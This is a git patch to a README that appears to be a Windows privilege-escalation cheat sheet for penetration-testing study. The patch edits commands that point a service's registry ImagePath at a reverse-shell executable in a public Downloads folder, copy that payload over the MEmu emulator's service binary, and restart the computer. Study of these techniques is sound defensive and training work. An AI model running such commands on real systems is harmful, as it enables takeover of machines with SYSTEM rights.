From bca1e092d744a039215a773c259688bd755f68d8 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Mon, 17 Oct 2022 08:26:08 -0400
Subject: [PATCH] Update README.md

---
 README.md | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 8d1c7bf..5b04807 100644
--- a/README.md
+++ b/README.md
@@ -1237,7 +1237,7 @@ Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
 reg query HKLM:\System\CurrentControlSet\Services\regsvc
 
 # Overwrite the imagePath registry key to point to reverse shell
-reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\{PAYLOAD PATH ex. C:\PrivEsc\reverse.exe} /f
+reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\Public\Downloads\run.exe /f
 
 # Start the service:
 net start regsvc
@@ -1258,9 +1258,13 @@ net start regsvc
 
 # Copy the reverse shell executable to overwrite the service executable
 copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
+Copy-Item "C:\Users\Public\Downloads\run.exe"  "C:\Program Files\Microvirt\MEmu\MemuService.exe"
+Rename-Item "C:\Program Files\Microvirt\MEmu\MemuService.exe" "C:\Program Files\Microvirt\MEmu\MemuService.bak"
+
 
 # Start the service
 net start filepermsvc
+Restart-Computer
 
 #########################################################################
 #### 5. DLL Hijacking ###################################################